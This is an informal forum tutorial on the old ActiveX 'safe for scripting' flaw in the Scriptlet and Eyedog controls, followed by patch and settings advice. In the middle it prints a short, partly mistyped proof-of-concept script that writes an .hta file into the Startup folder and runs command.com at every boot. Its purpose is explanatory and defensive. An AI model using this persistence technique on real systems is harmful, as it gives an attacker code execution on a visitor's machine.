Its been quite some time since I visited this site. Well... Its now or never. Time to make a comeback with a little tute.

Lets get to the point....

Most of us here know ActiveX, the OLE (Object Linking and Embedding) scripting for Internet Browsers. But can anyone think of a way with which you can hijack data? Well let me introduce you to the sins of ActiveX.

let me just introduce you to ActiveX first. The main function of the ActiveX that makes it vulnerable is the its capability of client side execution. ActiveX and Java are two of a very few languages that use client side execution.

This is how ActiveX works. The ActiveX controls have extensions of .ocx (Exept those written in Java). These objects are embedded into the browser using the <object> tag. This tag specifies the usage(properties) of the control and also the location of the control on the internet. When the user visits the web page with ActiveX controls, the browser first checks if the control is already in the registry. If not it'll download the script. Then it executes it and oh before execution it checks for Authenticode(Coming up). By default they the controls are downloaded into \windows\occache directory. This is where the fun begins, breaking the browser's security and hopping the Authenticode hurdle.

Microsoft'sAthenticode Paradigm permits scripts to be executed. This is done with a cryptographic mechanisms which involves the browser and a 3rd party (usually VeriSign).

Lets begin with the bugs. Yeah Yeah. I'm sorry to bug you with the boring part. But Hey, its Over.

ActiveX "Safe for Scripting Issue"

ActiveX controls usually are harmless functions. But scripts like scriptlet and Eyedog are rather irritating. scriptlet has the capablility to sneak into the local filesystem of the user and it can also create, edit and overwrite files. Eyedog can look into your registry.
Using these two functions, One can create Armagaddon(I've obviously splelled it wrong).

This safe for scripting issue was released by George Guininsky in 1999. If you want a taste of this script visit http://www.guininsky.com/scrtlb.html . When I mean a taste of the code I MEAN a taste of the code. Anyway, what the code does is very simple. The code creates a .hta file in the start up folder of the start menu. So every time you restart the comp, a message pops up . The code goes something like this:

Code:
//<object id="scr" classid="clsid:06290BDS-48AA-11D2-8432-006008C3FBFC">
//</object>

//<SCRIPT>
//scr.reset();
//scr.path="C:\\windows\\Start Mnu\\Programs\\StartUp\\guiniski.hta";
//scr.doc="<object id='wsh' clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'>
//</object>
//<SCRIPT>
//alert('Written by George Guininski');
//wsh.run('C:\\command.com');
//</"+"SCRIPT>;
//scr.write();
//</SCRIPT>
//</object>
Registered ActiveX controls can be marked as "Sae for Scripting" either by implementing IDObjectSafety within the control or by marking them as safe in the registry by adding the key 7DD95801-9882-11CF-9FA9-00AA006C42C4 TO to the implemented cateories of the control.

Can you just imagine how many such applications your system uses actively.
Goto Start->Run->dcomcnfg
You'll just be shocked seeing the amount of Active controls.

Remember the Eyedog function is only vulnerable if youre using Office 2k. I suppose it has been rectified in XP.

Avoiding the safe for scripting Issue:

Three measures are to be taken in order to protect yourself:

Step 1:

Get relevant patches for Scriptlet/EyeDog from http://www.microsoft.com/technet/sec...n/ms99-032.asp
and http://www.office.microsoft.com/down.../Uactlsec.aspx Respectively.
But these patches do not provide pretection for "accidental Trojans". "accidental Trojans" are nothin but loopholes not yet found.

Step 2:

Change the settings of Macros security level in all the the office apps (There is no global setting) to Maximum
Tools | Macro | Security in office 2k.

Step 3:

This is the most prominent and desperate step you can take. If you dont want to use activeX at all, just disable it.
Tools | Internet Options | Security | Custom Lvel | Disable Macros.
As simple as that. And no more ActiveX attacks.

Man I'm beat. I never 1 vulnerability would take this much. I've got a few more to go. Maybe some other time.
Till then, Saionara